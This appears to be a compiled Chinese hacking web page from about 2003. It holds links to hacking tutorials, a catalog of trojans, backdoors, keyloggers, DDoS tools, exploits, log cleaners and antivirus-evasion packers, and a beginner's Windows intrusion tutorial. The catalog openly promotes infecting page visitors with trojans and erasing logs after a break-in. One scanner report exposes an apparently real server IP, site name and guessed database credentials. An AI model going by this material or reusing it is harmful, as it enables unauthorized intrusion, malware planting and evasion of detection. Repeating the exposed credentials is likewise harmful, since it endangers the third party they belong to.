http://wwwb.pconline.com.cn/pcedu/soft/doc/10312/1.htm
Nmap详细使用说明 http://home.getdns.net/web/eva/nmap.txt
http://bbs.thugx.com:81/iB_html/uploads/post-10-96668-logo.gif
我收集了一些教程的下载地址。看教程重要的是学会其中的思路和创新,消化吸收成为自己的东西,并举一反三。不要当它们是资料库,要用时是很难找到想找的文章的。不同教程里会有文章重复,就当是强化记忆再看一遍。
(排名不分先后,^_^)
小西的黑客教程(菜鸟版)
http://www.sandflee.net/down/show.asp?id=213&down=1
流光教程电子版http://www.sandflee.net/down/show.asp?id=34&down=1
三陀工作室整理的DELPHI和黑客技巧1.5
http://stgzs.myetang.com/Hack/DelphiTechV1.5.chm
终端服务的电子书 http://www.sandflee.net/wawa/tools/termsrv.zip
ncc制作的超级菜鸟黑客速成 http://www.heibai.net/download/show.php?id=2136
溯雪 光影 小榕 论坛精华集 http://www.andyxu.net/banana/tools/netXeyes.chm
安全焦点文档精华 http://www.andyxu.net/banana/tools/xfocus_doc.rar
鹰派的网络经典教材http://www.sandflee.net/down/show.asp?id=63&down=1
rick的unix教材
http://www.sandflee.net/down/show.asp?id=153&down=1
幻影旅团 团长:刺 写的黑客教程
http://mybanqiao.jia.net/rije/banana/tools/hy.rar
菜牛兄写的汉化与破解软件教程
http://mybanqiao.jia.net/rije/banana/tools/niu.rar
单机安装WEB服务,FTP服务,Imail邮件服务,和超级雷傲论坛全攻略
http://www.andyxu.net/banana/tools/WEB.chm
雾中鸟的《系统网络入侵方法小结》
http://www.sandflee.net/down/show.asp?id=114&down=1
傲气雄鹰的教程 http://scfly.3322.net/
轰天炮写的黑客入门 http://mybanqiao.jia.net/rije/banana/tools/htp.rar
《黑客攻防指南》第一期
http://www.heibai.net/download/show.php?id=2216&down=1
小铭写的《网络最菜黑客指南》
http://www.heibai.net/download/show.php?id=1808&down=1
黑客防线全站教程 http://www.andyxu.net/banana/tools/banana_01.rar
菜鸟宝典 http://www.haowawa.com/down/cainiao.zip
黑客基础教材 论坛成员沉睡不醒收集制作
http://www.sandflee.net/down/show.asp?id=241&down=1
推荐网址
其实是我收藏夹的一部分啦。如果漏掉了什么好的,请一定通知我。
红色特为队 http://www.tbhacker.com/
网络休闲庄 http://www.tty-1.net/
灰色轨迹 http://www.sandflee.net/ 或 http://www.isgrey.com/
wawa烂页 http://61.184.86.21/
黑白网络 http://www.heibai.net/
刺客 http://www.netxeyes.com/
安全焦点 http://www.xfocus.net/
Peckerland http://peckerland.com/
小凤居 http://www.chinesehack.net/
幻影旅团总站BBS http://www.3389.net/bbs/
绿盟科技 http://security.nsfocus.com/
网络安全评估中心 http://www.cnns.net/
sometips http://www.sometips.com/
Aaron\’s Homepage http://www.exetools.com/
Whitecell Security Systems http://www.whitecell.org/
红色警戒 http://www.china4lert.org/
黑客防线 http://badbanana.3322.net/
中国鹰派 http://www.chinawill.net/
大学生网络联盟 http://www.cnhope.org/
天天安全网 http://www.ttian.net/
补天网 http://www.patching.net/
【网 嗅】http://www.netsill.com/
CNSAFE.NET http://www.cnsafe.net/ 搜索引擎
如果有找不到的软件工具、文章教程、漏洞资料、网站地址就用它试试:
Google http://www.google.com
Google被封就看这里
http://www.sandflee.net/cgi-bin/lb5…ic=11965&show=0
Google使用帮助:
http://www.sandflee.net/cgi-bin/lb5…um=1&topic=5001
还有几句“题外话”要说。我原本以为找些资料一两个通宵就能解决。结果陆续用了20个通宵。除了资料比较分散的原因外,主要是因为我自己平时完全没有系统地思考过这些问题,因此不能及时有效的表述出来。好在在找答案和看答案的同时,自己也获得了提高。如果各位能在这篇文章里找到一点自己需要的东西并获得提高,那我就心满意足了
成为顶级黑客必备软件
——————————————————————————–
佚名 时间:2003-8-18 15:00:48
CGI后门:
cgi网页后门 cgi网页后门,envymask编写…《
网页合并器 本程序可以自动生成网页,可以把网页和EXE合成新的网页,在打开网页的同时自动运行EXE文件.你将木马合并在一个网页中,别人浏览之后,呵呵,我什么都没说~~~
海阳顶端网木马 windows环境下永远不会被查杀的木马,因为它是用asp做的,也是一套asp在线极好的网页编辑软件,支持在线更改、编辑、删除任意文本文件,同时最重要的是解决了无组件asp上传…(中文版
cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门,涵盖jsp,php,asp,cgi等等) *
命令行后门类
winshell
WinShell是一个运行在Windows平台上的Telnet服务器软件,主程序是一个仅仅5k左右的可执行文件,可完全独立执行而不依赖于任何系统动态连接库,尽管它体积小小,却功能不凡,支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等…《入侵NT中winshell的使用》
Gina
Gina木马的主要作用是在系统用户登陆时,将用户登陆的名字,登陆密码等记录到文件中去,因为这个DLL是在登陆时加载,所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户…儒
Wollf1.5 我们的一位女黑客写的软件,扩展Telnet服务,集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能,可反向连接,可通过参数选择随系统启动或作为普通进程启动
WinEggDrop Shell 1.50最终版在 一个扩展型的telnet后门程序{中国最强的后门}
**********************************************************************************************
菜鸟扫描软件!
20CN IPC 扫描器正式版
全自动IPC扫描器,可以同步植入木马,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户…(中文版)
网络肉鸡猎手
一个快速查找网络肉鸡的小工具
网页信息神探 使得网页不再有秘密,各种信息一目了然,什么电影、图片、Email地址、文章、Flash、压缩文件、可执行文件…等等的链接地址无处可藏!连续而快速下载各种软件、打包教程、VB、VC、动画教程、Flash、电影、写真图片
**************************************************************************************
SQL2.exe SQL蠕重听过吧,就是的这个漏洞!
NetScanTools 一款功能强大的网络工具包…(英文版)
dvbbs.exe
动网logout.asp利用程序
THCsql
针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序,内含源代码。
小紫V2.0追加版
*小紫*(LB论坛噩梦)V2.0追加版加入LB.EXE,可以获得论坛管理员权限。
LB5论坛轰炸机
我兄弟写的程序,{推存}
LB5论坛轰炸机修正版2.5在LB5论坛轰炸机修正版2.0的原有功能基础上增加以下功能及特性:1同时支持6线程轰炸,速度可比V2.0提高一倍以上 2机器智能重新增加,带有自动转向定位功能 3增加监视窗口 4标题可改…(
MSN 消息攻击机
这是一个用于MSN Messenger 的消息攻击机(其实不局限于MSN 的),它具有超快的攻击速度,据测试,在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而且软件体积极小,有效节省系统资源…(
怪狗专用版3389登陆器 我改的一个小程序,有用户名密码,用它可以3389登陆win系统,(必备)
DameWare NT Utilities
一款功能强大的Windows NT/2000/XP 服务器远程控制软件,只要拥有一个远程主机的管理帐号,就能使用它远程GUI下登陆交互控制主机…(英文版)《
追捕: 找到IP所在地!
柳叶擦眼
这个小软件可以列出系统所有的进程(包括隐藏的),并可以杀死进程.这个是共享软件…(中文版)《让传奇木马走开》
Xdebug ey4s大哥写的windows 2000 kernel exploit,有了它提升权限就简单了!
代理之狐 可得到最新代理,用于隐藏真实IP,不过,有能力最好自己在肉机上做个代理安全!
HackerDicBuilder 本软件属于一款字典制作工具,根据国人设置密码的习惯,利用线程技术,生成字典文件 … (中文版) 多位朋友点播
scanipc 这个是木头见过的最傻瓜化的入侵软件了,只要设置好你要上传的后门和IP范围,它就会开始工作了,界面简单实用,全自动IPC扫描器,可以同步植入木马,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户 …
Tiny Honeypot 这是一款简单的蜜罐程序,主要基于iptables的重定向和一个xinetd监听程序,它监听当前没有使用的每个TCP端口记录所有的活动信息,并且提供一些回送信息给入侵者。应答部分全部采用perl程序编写,它提供了足够的交互信息足以愚弄大多数的自动攻击工具和小部分的入侵者。通过缺省的适当限制,该程序可以安装在产品主机上,而几乎不会影响主机的性能(应用平台Linux/POSIX)
Clearlog 用于删除Windows NT/2K/XP的WWW和FTP安全日志文件,通常入侵某台服务器后为了避免被跟踪,都采用这一方法来消除IP记录 … 《入侵全攻略》
LC4 可以检测用户是否使用了不安全的密码,是最好,最快的Win NT/2000 workstations 密码破解工具,目前这是最新版本.它宣称:在P300机器上不到48小时可以破解90%的超级用户(Admin)口令.18%不到10分钟就可以破解出来 …
独裁者 DDOS 工具, 此软件太厉害,千万不可烂用,否则可能进监狱!
LocatorHack.exe MS Locator!formQueryPacket.wcscpy 远程溢出工具与webdav漏洞一样厉害。Microsoft Windows Locator服务远程缓冲区溢出漏洞
TFTPD32.exe 图形化的TPTP工具,做黑客这样的工具都没有,说不过去!
iis5sp3 说明中说,iis5安装sp3的溢出成功,反正我在sp3下没成功过!
smbrelay.exe 可利用网页得到NT密码散列!{推存}
IECookiesView1.5 可改写cookies信息,有此工具进行cookies欺骗就简单多了,
HackPass.exe,MD5.exe 破解MD5密码的软件~!
DVGetPass.exe 动网tongji.asp漏洞利用工具,可得到论坛管理员权限,再上传ASP木马!呵呵就~~~~
webadv 针对iis+sp3的溢出成功率很高(溢出后system权限!) *
R_ webadv 能用版的webdav漏洞使用工具!听说,日本,繁体都能用,
ipscan 大范围网段快速ipc$猜解
svc 远程安装/删除win2k服务
3389.vbs 远程安装win2k终端服务不需i386
arpsniffer arp环境sniffer(需要winpcap2.1以上) *
ascii 查询字符和数字ascii码(常用来对url编码用以躲避ids或脚本过滤)
ca 远程克隆账号
cca 检查是否有克隆账号
crackvnc 远程/本地破解winvnc密码(本地破用-W参数)
pass.dic 密码字典
debploit win2k+sp2配置最佳权限提升工具
fpipe 端口重定向工具
fscan superscan命令行版本(可定义扫描时的源端口并支持udp端口扫描) *
hgod04 ddos攻击器
idahack ida溢出
idq.dll 利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效,也是很棒的web后门)
IIS idq溢出
inst.zip 指定程序安装为win2k服务 *
ip_mail.rar 发送主机动态IP的软件 *
ipc.vbs 不依赖ipc$给远程主机开telnet
ispc.exe idq.dll连接客户端
Keyghost.zip 正版键盘记录器
log.vbs 日志清除器(远程清除不依赖ipc$)
msadc.pl winnt的msadc漏洞溢出器 *
MsSqlHack mssql溢出程序1
mysql-client mysql客户端
Name.dic 最常用的中国人用户名(看看你常用的用户名在不在里面)
PassSniffer 大小仅3kb的非交换机sniffer软件 *
psexec 通过ipc管道直接登录主机
pskill 杀进程高手
pslist 列进程高手
rar 命令行下的中文版winrar(功能相当全面) *
reboot.vbs 远程重启主机的脚本
sdemo.zip 巨好的屏幕拍摄的录像软件
shed 远程查找win9x的共享资源
sid 用sid列用户名
SkServerGUI snake多重代理软件
SkSockServer snake代理程序
SMBCrack 是小榕为流光5开发的测试原型,和以往的SMB(共享)暴力破解工具不同,没有采用系统的API,而是使用了SMB的协议。Windows 2000可以在同一个会话内进行多次密码试探 … 《入侵全攻略》
socks 利用这工具安装木马,即使网关重新低格硬盘木马也在嘿嘿 *
SocksCap 把socks5代理转化为万能代理
SPC.zip 可以直接显示出远程win98共享资源密码的东东 *
WMIhack 基于WMI服务进行账号密码的东东(不需要ipc)
skmontor snake的注册表监视器(特酷的)
sql1.exe mssql溢出程序2
sql2.exe mssql溢出程序3
SqlExec mssql客户端
SuperScan GUI界面的优秀扫描器
syn syn攻击第一高手
upx120 特好的压缩软件,常用来压缩木马躲避杀毒软件
wget 命令行下的http下载软件
Win2kPass2 win2k的密码大盗
Winnuke 攻击rpc服务的软件(win2ksp0/1/2/3+winnt+winxp系统不稳定)
smbnuke 攻击netbios的软件(win2ksp0/1/2/3+winnt+winxp系统死机)
WinPcap_2_3 nmap,arpsniffer等等都要用这个
WinPcap_2_3_nogui.exe 无安装界面自动安装的WinPcap_2_3(命令行版) *
scanbaby2.0 能对80%的mail服务利用漏洞列账号密码破解(超酷哦,去看rfc里有mail弱点说明) *
SuperDic_V31 非常全面的黑客字典生成器
Getadmin win2k+sp3配置的权限提升程序(不错!!!) *
whoami 了理自己的权限
FsSniffer 巨好的非交换机sniffer工具
twwwscan 命令行下巨好的cgi扫描器
TFTPD32 给远方开tftp服务的主机传文件(当然要有个shell)
RangeScan 自定义cgi漏洞的GUI扫描器
pwdump2 本地抓winnt/2k密码散列值(不可缺)
pwdump3 远程抓winnt/2k密码散列值(不可缺)
procexpnt 查看系统进程与端口关联(GUI界面) *
nc 已经不是简单的telnet客户端了
CMD.txt 有什么cmd命令不懂就查查它 *
fport 命令行下查看系统进程与端口关联(没有GUI界面的procexpnt强)
BrutusA2 全功能的密码破解软件,支持telnet,ftp,http等服务的口令破解
cmd.reg 文件名自动补全的reg文件(命令行:按TAB键自动把sys补全为system,再按一次就变为system32)
regshell 命令行下的注册表编辑器
nscopy 备份员工具(当你是Backup Operators组的用户时有时你的权限会比admin还大)
session.rar 有了win/nt2000目标主机的密码散列值,就可以直接发送散列值给主机而登录主机 *
klogger.exe 一个几kb的击键记录工具,运行后会在当前目录生成KLOGGER.TXT文件 *
smb2 发动smb的中间人MITM攻击的工具,在session中插入自己的执行命令 *
xptsc.rar winxp的远程终端客户端(支持win2000/xp)
SQLhack.zip 相当快的mssql密码暴力破解器
mssql 相当快的mssql密码暴力破解器
ntcrack.zip 利用获取到的MD4 passwd hash破解帐号密码
SQLSniffer.rar MSsql的密码明文嗅探器
TelnetHack.rar 在拥有管理员权限的条件下,远程打开WIN2000机器的Telnet服务
RFPortXP.exe XP下关联端口与进程的程序
SQLTools.rar mssql工具包
ServiceApp.exe 远程安装/删除服务
hgod 具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项
hscan 小型综合扫描器(支持cisco,mysql,mssql,cgi,rpc,ipc(sid),ftp,ssh,smtp等等相当全面)
HDoor.rar ping后门(icmp后门)
SIDUserEnum.exe 利用sid得到用户列表(小榕的那个sid有时不能完全列举出来) *
RPC_LE.exe 利用rpc溢出使win2k重启(对sp3+sp4hotfix有效) *
r3389.exe 查询Terminal Server更改后的端口(1秒内) *
smbsniffer.exe 获取访问本地主机网页的主机散列值(支持截获内网主机散列) *
NetEnum.exe 通过3389端口+空连接获取对方主机大量信息 *
aspcode.exe 经测试最有效的asp溢出程序第二版(对sp2有效)
sslproxy 针对使用ssl加密协议的代理(扫描器通过它就可以扫描ssl主机了!!!!) *
lsa2 在lsa注册表键里获取winnt/2k的明文密码包括sqlserver的(打了补丁就没用了) *
psu.exe 用指定进程的权限打开指定的程序
ldap.msi ldap 轻量级目录服务客户端,通过389端口获取主机大量信息如账号列表 *
rootkit 从系统底层完美隐藏指定进程,服务,注册表鍵并可以端口绑定的内核级win2k后门!!! *
Xscan 一款强大的扫描软件,可以和流光相媲美 采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,SNMP信息,CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,NT服务器NETBIOS信息、注册表信息等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。 增SSL插件,用于检测SSL漏洞;升级PORT、HTTP、IIS插件…(
x-way2.5 采用多线程形式对服务器系统进行漏洞扫描和安全测试工具,X-WAY多个版本均在Win2000下开发,建议用户使用时候也在Win2000环境,以发挥最佳效果…(中文版)《扫描工具,别忘了x-way2.5》
SSS 俄罗斯出的,最好的扫描软件,还有分析,有漏洞描述,速度慢了点,它是我见地的最好的扫描软件!
NAMP 我一直用的是个这命令行的扫描软件,有win,LINUX版的,又快,又好,支持TCP,UDP,ICMP,安全扫描不会留下扫描日志!
下面的软件本来不想收进来给大家看,因为顶级黑客不入侵个人电脑,基本不用别人写的木马,肯定是人手一个(自己编写的木马)
没有任何杀毒软件能查出来的。
**********************************************************************************************
使用木马改造工具:
ASPack 这个是使用木马都一定要会用的工具,它能压缩木马,不让杀毒软件查出来!
UPX 非常好的可执行文件压缩软件,支持的格式包括 atari/tos,djgpp2/coff,dos/com,dos/exe,dos/sys,rtm32/pe,tmt/adam,watcom/le,win32/pe,Linux/i386 等等,压缩比率也非常的高 …
**************************************************************************************
菜鸟级木马类:
黑境
近墨者
魔法控制
灰鸽子
风雪 国产后门风雪,此版根据一些网友的建议,改进了几个功能,一个是可以配置是否自动共享C盘的功能,另一个是在查看菜单上加上了密码是否用*号来表示,同时修正了1.3版本在打开网址时按取消键仍会打开网址的BUG…(
网络神偷 一款远程控制软件,更新速度较快,可以访问局域网中的计算机,连接稳定上传下载速度快,但是会被很多杀毒厂商看成木马病毒追杀,要求使用者有自己的FTP空间 … (中文版
冰河 3
广外男生
广外女生
Peep
一套运用反端口技术的远程监控软体,运用此原理可以达到一般远程控制软体所无法达到之功能,例如可对区域网路及有架设防火墙的电脑作监控,被控端电脑将具有自动回传连线之功能,通讯埠可任意动态修改,及具有独立连线,也就是说除您本人其他人无法连线监控。其他的功能还有上线通知、连线速率调整、远端档案总管、远端桌面监控、
远端进程管理、远端登录编辑、网页通报服务、DDoS攻击、还有被控端程式设置精灵、有常驻选择、文件捆绑及连线方式等选项…(中文版)
木牛隐型版 运行后,服务器上硬盘C盘符共享(完全控制权限)开启ADMIN$、IPC$共享,开启TELNET服务,自动创建一个管理员权限帐号:IUSR_COMPUTER 密码:IUSR_COMPUTER…该版本自动修改注册表,重起后自动运行
IE\’en 通过IE远程控制的软件。它可以远程遥控IE动作,可以直接截取IE和任何服务器之间的数据通讯,你在IE中输入的用户名、密码等机密信息都在此列,它可以以纯文本方式存储或发送这些信息,一旦启动这一软件,远端被监控的浏览器窗口中进行的任何输入输出都会显示在本地IE\’en中。运行ieen_s.exe(注:服务端)需要管理员权限
盗密高手 监视被监视端(装了此程序的电脑)上QQ、邮箱等各种密码,并发送到您设置的邮箱
*****************************************************************************************
后记:
以上的软件我都有,也基本都测试过,有了好的工具才能事半功倍,以上的软件中国顶级黑客使用的软件,都是这些。
其实,主要还是自己编写的黑客软件用的多,只会用别的人工具,那不是顶级黑客
%10的工具灵活应用+%30经验技术+%60的分析=一次较有深度的安全检测
windows入侵初级教程
========写在前面的废话==========
这是一份给初学者的入门教程,高手就不必看了。
终于放假了,闷头睡了两天。实在闲着无聊,翻了翻资料库,什么乱七八糟的,就整理了这份东西。
首先声明,本人不是黑客,只是个普通的网络安全技术爱好者(*^_^*真是脸红,好恶心的名称)。说到这里,我想有必要谈谈什么是黑客,恩……一时半会也说不清(谁在嘘我?)。如果有空,你不妨读读《国内黑客高手的联系方法》《你尽力了吗》(本站有收录),看看什么才是真正的高手。
其实,对于入侵来说,我一直相信这样一句话,如果网络管理员能够多花1%的精力,那么99%的攻击都可以拒之门外(谁?谁又在嘘我?)。有人可能要问了,这么说攻击那不就很难了?呵呵……可是就有那么多猪头网管,一定要等人把自己的站黑了之后,才想到要打补丁。
为什么想到要写windows的教程呢?原因应该有很多了。其一,现在网络上windows的主机实在是不少,至少国内是这样了,有人说有10%,我看差不多有50%(呵呵……也许夸张了!)二。windows的漏洞太多,太杂。三,……等等(又嘘!)。
微软的IIS服务器由于其使用的简便,被国内大部分中小网站使用。但是,也就是因为它的使用简便,只是微软服务器一直成为黑客最喜欢攻击的目标,于是,几乎大家已经形成一个心里定式,那就是微软的服务器是不安全的、脆弱的。
其实这个我们我们应该一分为二的看,一是微软的系统本身的问题,不可否认,微软的系统特别是IIS的确有较多漏洞,有些漏洞设置威胁到这个系统的安全;另一方便,国内的大多数网管其实并没有真正的研究过系统漏洞甚至完全没有仔细设置过IIS的安全,所以,现在我们只要在网上随便找就可以找到很多几年前的就发现的IIS漏洞的服务器,这不能不说是网管的责任。 其实,如果配置得当,windows的安全性还是可以让人放心的。
入侵一个系统有很多步骤,阶段性很强的“工作”,其最终的目标是获得超级用户权限——对目标系统的绝对控制。从对该系统一无所知开始,我们利用其提供的各种网络服务收集关于它的信息,这些信息暴露出系统的安全脆弱性或潜在入口;然后我们利用这些网络服务固有的或配置上的漏洞,试图从目标系统上取回重要信息(如口令文件)或在上面执行命令,通过这些办法,我们有可能在该系统上获得一个普通的shell接口;接下来,我们再利用目标系统本地的操作系统或应用程序的漏洞试图提升我们在该系统上的权限,攫取超级用户控制;适当的善后工作包括隐藏身份、消除痕迹、安置特洛伊木马和留后门。
废话说了那么多……不说了。
第一部分
===========扫描===================
这一步可以称作信息的收集。从对攻击目标一无所知开始,通过种种尝试,获得越来越多的关于它的信息;攻击者的哲学是:没有无用的信息。几乎关于攻击目标的任何知识都是可能的入侵入口,举凡操作系统类型、版本、用户名等,即使是一些表面上无害的信息,也可能通过和别的信息综合而构成暴露系统漏洞的消息。
其实,大多数攻击最初是没有明确的目标的。诸位看官可能要失望了!因为太多的电影美化了攻击者的形象,好象他们个个是天才,想干什么就能干什么。而事实是攻击是一种很乏味的工作。收集信息–》测试–》失败–》再收集–》再试–》再失败……–》只到成功。哦,跑题了^_^!
对于扫描器的选择,本人私下推荐小榕的流光(www.netxeyes.com)和xfocus的x-scan(www.xfocus.net)。而流光无论在速度和准确性上似乎都更胜一筹,但是流光有ip限制和时间限制,不爽!其实,流光不止有扫描功能。它实在太强大了,如果你想成为一个真正的高手,还是少用为好。x-scan虽然速度什么的不是很好,而且不稳定,但它的“漏洞资料”本身就是一份很好的入门教程,虽然不是很详细,但它提供了一个很好的方向,不过,1.2版本之后,怎么成英文的了。
1。ping
先用ping命令看看ip是不是存活。
c:\>ping www.xxx.edu.cn
Pinging www.xxx.edu.cn [xxx.xxx.xxx.xxx] with 32 bytes of data:
Reply from xxx.xxx.xxx.xxx: bytes=32 time=50ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116
Ping statistics for xxx.xxx.xxx.xxx:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 50ms, Average = 42ms
c:\>_
其中,返回的xxx.xxx.xxx.xxx就是该域名所对应的ip。
我们注意,ttl:指定数据报被路由器丢弃之前允许通过的网段数量。
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。
转发 IP 数据包时,要求路由器至少将 TTL 减小 1!
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
有的经过修改注册表可以修改ttl返回的值的!
从这里我们可以大致判断出对方主机的系统类型,因为大多数网管是不会改ttl值的 。
2。端口扫描
端口扫描是通过扫描找出目标系统开放的服务端口从而推断出目标系统上运行的服务,通过这些服务可能获取进一步的知识或通往系统的路径。端口扫描的程序所在多有,可从网上免费获取。如x-port,流光和x-scan也都中和了端口扫描功能。
有兴趣的话可以看看services文件,它列出了一些服务和与之对应的端口号。
c:\windows>edit services
一般来说,服务开的越多,漏洞就越多,机会也就越多。
写到这里,连我都有点烦了,说些什么东西呀?都什么年代了,还说这些老掉牙的东西。现在的攻击可以说是变的很简单了,网络上什么工具都有。一个漏洞出来,马上就有相应的测试或攻击程序出来。攻击者只要拿些现成的东西用。什么?现成的软件不会用?大哥,不要开玩笑了,帮助文件会看么?什么,不是吧,还是不会,那我帮不了你了。
我们还是来看看怎么判断系统,注意我们说的是windows系列,一般来说,现在连在internet上的服务器除了win NT就是win2000了,怎么区分呢?
可以输入如下命令:
telnet xxx.xxx.xxx.xxx 80
GET INDEX.HTML
可以看到回显: Microsoft-IIS/4.0或: Microsoft-IIS/5.0。如果是: IIS 4.0那么系统极有可能是NT。如果是: 5.0的,那么就是2000了。但有些服务器把WEB运行在
8080,81,8000,8001口,你就TELNET相应的口上。
其实现在的扫描器真的是很好,根本就用不着这么麻烦,扫完之后,看一下报告就什么都有了。
真是枯燥啊!(我都打哈欠了……呵呵,早上三点了。)现在来点生动的,我们来看2份流光的报告。
(由于,第一份报告可能会暴露火丁的身份,故隐去。)
——————————————————————-
——————————————————————-
http://www.netXeyes.com
http://www.netXeyes.org
【小榕作品】
小榕软件实验室 1995-2001
xxx.xxx.xxx.xxx
——————————————————————
端口扫描
80(HTTP)
21(FTP Control)
25(SMTP)
443(HTTPS)
5631(PCAnyWhere)
3306(MYSQL)
———————————————————————
FTP扫描
FTP版本信息: Serv-U FTP 服务器 v3.0 for WinSock 就绪…
———————————————————————
SMTP扫描
SMTP版本信息: 220-xxxx.xxx.edu.cn Microsoft SMTP MAIL ready at Thu, 3 Jan 2002 21:21:24 +0800 Version: 5.5.1775.675.6 220 ESMTP spoken here
支持VRFY
———————————————————————
CGI扫描
WEB版本信息: Microsoft-IIS/4.0
WWW 标题: :::值得为自己放一天假!!
扫描成功CGI漏洞
/msadc/samples/adctest.asp (HTTP: 200 )
/scripts/tools/newdsn.exe (HTTP: 200 )
/scripts/tools/mkilog.exe (HTTP: 200 )
/scripts/tools/getdrvrs.exe (HTTP: 200 )
/scripts/tools/dsnform.exe (HTTP: 200 )
/scripts/iisadmin/bdir.htr (HTTP: 200 )
/msadc/samples/selector/showcode.asp (HTTP: 200 )
/msadc/Samples/SELECTOR/showcode.asp (HTTP: 200 )
/msadc/samples/adctest.asp (HTTP: 200 )
/msadc/msadcs.dll (HTTP: 200 )
/default.asp+.htr (HTTP: 200 )
/default.asp::$DATA (HTTP: 200 )
/default.asp%81 (HTTP: 200 )
/iisadmpwd/aexp4b.htr (HTTP: 200 )
/iisadmpwd/aexp4.htr (HTTP: 200 )
/iisadmpwd/anot.htr (HTTP: 200 )
/iisadmpwd/aexp.htr (HTTP: 200 )
/iisadmpwd/anot3.htr (HTTP: 200 )
/iisadmpwd/aexp3.htr (HTTP: 200 )
/iisadmpwd/aexp2.htr (HTTP: 200 )
/iisadmpwd/aexp2b.htr (HTTP: 200 )
/iisadmpwd/achg.htr (HTTP: 200 )
/IISADMPWD/achg.htr (HTTP: 200 )
/_AuthChangeUrl? (HTTP: 200 )
/_AuthChangeUrl (HTTP: 200 )
/?PageServices (HTTP: 200 )
———————————————————————
MISC
MySQL Version is: 3.23.35a?
猜解成功用户帐号 root:(NULL)
————————————————————————-
————————————————————————-
这是一份典型的NT服务器漏洞报告,下面这一份是2000的。
———————————————————————–
———————————————————————–
http://www.netXeyes.com
http://www.netXeyes.org
【小榕作品】
小榕软件实验室 1995-2001
211.100.17.158 (211.100.17.158)
——————————————————————-
端口扫描
80(HTTP)
25(SMTP)
80(HTTP)
53(DNS)
443(HTTPS)
————————————————————————
SMTP扫描
SMTP版本信息: 220 zhihongweb Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at Fri, 23 Nov 2001 17:41:10 +0800
支持VRFY
————————————————————————-
MSSQL扫描
猜解成功用户帐号 sa:(NULL) zhihong:zhnet75717
——————————————————————-
CGI扫描
WEB版本信息: Microsoft-IIS/5.0
WWW 标题:中鸿网–>专业的网上教学资源库
扫描成功CGI漏洞
/scripts/samples/search/simple.idq (HTTP: 200 )
/scripts/samples/search/queryhit.idq (HTTP: 200 )
/scripts/samples/search/query.idq (HTTP: 200 )
/scripts/samples/search/qsumrhit.htw (HTTP: 200 )
/scripts/samples/search/qfullhit.htw (HTTP: 200 )
/scripts/samples/search/filetime.idq (HTTP: 200 )
/scripts/samples/search/author.idq (HTTP: 200 )
/scripts/samples/search/filesize.idq (HTTP: 200 )
/iissamples/issamples/query.idq (HTTP: 200 )
/iissamples/issamples/oop/qsumrhit.htw (HTTP: 200 )
/iissamples/exair/search/search.idq (HTTP: 200 )
/iissamples/issamples/fastq.idq (HTTP: 200 )
/iishelp/iis/misc/iirturnh.htw (HTTP: 200 )
/index.asp%81 (HTTP: 200 )
/iissamples/issamples/oop/qfullhit.htw (HTTP: 200 )
/iissamples/exair/search/qsumrhit.htw (HTTP: 200 )
/iissamples/exair/search/query.idq (HTTP: 200 )
/iissamples/exair/search/qfullhit.htw (HTTP: 200 )
/blabla.idq (HTTP: 200 )
/abczxv.htw (HTTP: 200 )
/?PageServices (HTTP: 200 )
/*.idq (HTTP: 200 )
/*.ida (HTTP: 200 )
—————————————————————–
Plugins
IIS5.0 .Printer Exploit(Grant System Privileges)
——————————————————————-
——————————————————————-
就让这两份报告把我们带入下一部分(呜……好困!睡了.明天再开始进入第二部分吧,再有几天就过年了)。
第二部分
================漏洞利用===============
我一直在考虑这一部份的题目叫什么好呢?在安全界有这样一个术语叫“exploit”,很明显直译肯定不对,我一直不是很清楚怎么翻译。我想大概就是“漏洞利用”这个意思。其实指的是程序或工具,而现在是我想说的是过程和方法。
这里,我想作一点说明,就是以下所讲的,不是上面两份报告的分析。而是对所有windwos可能出现漏洞的攻击方法的介绍。所以上面没有扫到的漏洞,下面也会叙述到。
当然,也是不可能每一样都介绍到,如果有高手有什么指教的话,请发信到huodingx@263.net我的邮箱,或者,到我的个人主页http://huodingx.yeah.net,大家交流,交流。
其实,从一开始打算写这份东西,我也不知道要把它做成什么样,就想写到那,算那。不过,现在有点眉目了,呵呵……有点样子了。
——输入法漏洞————-
关于这个东东,windwos2000一推出,网上就有报道了,可以绕过口令登陆而进入windows。具体做法是,当看到windwos的登陆界面,就按快捷键切换输入法到全拼输入法,点击鼠标右键,打开“帮助”,看到有链接的地方,按住ctrl键,同时点击右键,这时会打开一个IE窗口。呵呵……到了这里,知道怎么做了吧。在地址栏中输入c:\
就会出现c盘的内容。在用户管理那里,你甚至可以往Administrators组里添加用户。
关于远程利用这个漏洞,如果对方主机,开3389端口的远程登陆服务,那么你可以用附件中的远程登陆的客户端程序进行登陆,连接后就跟操作自己的机器一样,如果有输入法漏洞,就可以按照上述方法进行测试。火丁很是不幸,一直没有机会远程测试。不过自己的机器,到是试过。
——–IIS unicode漏洞——–
